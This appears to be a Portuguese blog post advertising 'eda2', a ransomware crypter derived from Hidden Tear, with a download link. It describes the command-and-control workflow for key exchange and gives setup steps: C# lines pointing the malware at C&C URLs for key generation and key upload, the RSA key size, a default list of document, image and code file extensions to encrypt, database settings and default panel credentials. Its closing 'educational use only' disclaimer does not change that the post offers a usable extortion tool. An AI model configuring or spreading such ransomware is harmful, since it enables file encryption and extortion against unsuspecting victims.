É um exemplo de crypter de arquivo ransomware, que pode ser modificado para propósitos específicos. É uma versão mais extensa do rasgo oculto.
Características
- Usa os algoritmos RSA e AES.
- Coordena com um servidor de Comando e Controle.
- Usa CSPRNG
- Usa phplibsec
- Arquivos criptografados podem ser descriptografados no programa de descriptografia com chave de criptografia.
- Muda o fundo da área de trabalho.
Vídeo de Demonstração
Fluxo de trabalho
- O programa envia uma solicitação POST ao servidor C & C com variáveis pcname e username.
- O servidor C & C cria um par de chaves pública / privada RSA. Envia a chave pública para o programa, salva a chave privada dentro do banco de dados Mysql
- Programa cria uma chave aleatória para o algoritmo AES
- Programa criptografa arquivos com o algoritmo AES
- O programa criptografa a chave AES com chave pública RSA e a envia para o servidor C & C com solicitação POST
- Servidor C & C salva a chave AES criptografada dentro do banco de dados Mysql
Uso
- Você precisa ter um servidor web que execute Php e Mysql. Altere esta linha com seu URL
string generatorUrl = "http://www.example.com/panel/createkeys.php" ; string keySaveUrl = "http://www.example.com/panel/savekey.php";
- Ele usa 2048 como tamanho de chave RSA. Você pode mudar issoconst int keySize = 2048;
As extensões de arquivo de destino podem ser alteradas. Lista padrão:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
- Edite as configurações do seu banco de dados em db.php
- Credenciais de login padrão para o painel da web: nome de usuário: senha de teste: teste
- Você pode usar o programa de descriptografia do Hidden Tear para descriptografar arquivos.
Aviso Legal
Embora isso possa ser útil para alguns, existem riscos significativos. O eda2 pode ser usado apenas para fins educacionais. Não o use como um ransomware! Você poderia ir para a prisão por obstrução de acusações de justiça apenas por executar o eda2, mesmo que você seja inocente.
DOWNLOAD: AQUI
Nenhum comentário:
Postar um comentário